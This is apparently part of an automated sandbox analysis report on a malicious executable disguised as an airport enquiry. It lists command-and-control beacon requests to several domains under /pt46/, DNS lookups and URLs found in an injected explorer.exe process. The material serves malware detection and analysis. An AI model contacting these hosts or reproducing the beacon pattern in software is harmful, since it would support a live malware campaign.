          Source: global trafficHTTP traffic detected: GET /pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAz HTTP/1.1Host: www.arlatwestern.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz HTTP/1.1Host: www.wvufcw948o.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz HTTP/1.1Host: www.wheresthechocolateat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=ssXGlCK/Wr83GZj+/MTEyAbCjYKb/LDYuNd6sJpjn9vteR/o4Disu/XP81BMj74Ur0OQ&D8V=_FNDAz HTTP/1.1Host: www.serverdayz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p0kwtIsH7m9&D8V=_FNDAz HTTP/1.1Host: www.theselflovesite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.224.212.214 103.224.212.214
          Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CF25E2
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAz HTTP/1.1Host: www.arlatwestern.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz HTTP/1.1Host: www.wvufcw948o.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz HTTP/1.1Host: www.wheresthechocolateat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=ssXGlCK/Wr83GZj+/MTEyAbCjYKb/LDYuNd6sJpjn9vteR/o4Disu/XP81BMj74Ur0OQ&D8V=_FNDAz HTTP/1.1Host: www.serverdayz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p0kwtIsH7m9&D8V=_FNDAz HTTP/1.1Host: www.theselflovesite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.strategiclogisticsagency.com
          Source: global trafficDNS traffic detected: DNS query: www.arlatwestern.shop
          Source: global trafficDNS traffic detected: DNS query: www.betbox2341.com
          Source: global trafficDNS traffic detected: DNS query: www.af28.top
          Source: global trafficDNS traffic detected: DNS query: www.wvufcw948o.top
          Source: global trafficDNS traffic detected: DNS query: www.wheresthechocolateat.com
          Source: global trafficDNS traffic detected: DNS query: www.serverdayz.com
          Source: global trafficDNS traffic detected: DNS query: www.theselflovesite.com
          Source: global trafficDNS traffic detected: DNS query: www.iiixc759q.xyz
          Source: global trafficDNS traffic detected: DNS query: www.sliveringaf.christmas
          Source: explorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000002.00000000.1691865413.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1693513837.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1692211406.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.af28.top
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.af28.top/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.af28.top/pt46/www.wvufcw948o.top
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.af28.topReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arlatwestern.shop
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arlatwestern.shop/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arlatwestern.shop/pt46/www.betbox2341.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arlatwestern.shopReferer:
          Source: explorer.exe, 00000002.00000003.3105555593.000000000C9E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105760256.000000000C9C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3459517159.000000000C9E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105408163.000000000C96C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105927486.000000000C9E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.betbox2341.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.betbox2341.com/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.betbox2341.com/pt46/www.dreziuy.xyz
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.betbox2341.comReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cb214.pro
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cb214.pro/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cb214.pro/pt46/www.uddyen.shop
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cb214.proReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dreziuy.xyz
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dreziuy.xyz/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dreziuy.xyz/pt46/www.af28.top
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dreziuy.xyzReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.harbalmaizik.com
          Source: explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.harbalmaizik.com/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.harbalmaizik.comReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iiixc759q.xyz
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iiixc759q.xyz/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iiixc759q.xyz/pt46/www.sliveringaf.christmas
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iiixc759q.xyzReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.per-watch.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.per-watch.com/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.per-watch.com/pt46/www.cb214.pro
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.per-watch.comReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serverdayz.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serverdayz.com/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serverdayz.com/pt46/www.theselflovesite.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serverdayz.comReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sliveringaf.christmas
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sliveringaf.christmas/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sliveringaf.christmas/pt46/www.twinportslocal.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sliveringaf.christmasReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.strategiclogisticsagency.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.strategiclogisticsagency.com/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.strategiclogisticsagency.com/pt46/www.arlatwestern.shop
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.strategiclogisticsagency.comReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theselflovesite.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theselflovesite.com/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theselflovesite.com/pt46/www.iiixc759q.xyz
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theselflovesite.comReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinportslocal.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinportslocal.com/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinportslocal.com/pt46/www.per-watch.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinportslocal.comReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uddyen.shop
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uddyen.shop/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uddyen.shop/pt46/www.harbalmaizik.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uddyen.shopReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wheresthechocolateat.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wheresthechocolateat.com/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wheresthechocolateat.com/pt46/www.serverdayz.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wheresthechocolateat.comReferer:
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wvufcw948o.top
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wvufcw948o.top/pt46/
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wvufcw948o.top/pt46/www.wheresthechocolateat.com
          Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wvufcw948o.topReferer:
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000002.00000003.3106168394.000000000370C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1689421326.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1690234214.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4131906995.000000000371D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3107315493.000000000371C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000002.00000002.4135304707.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
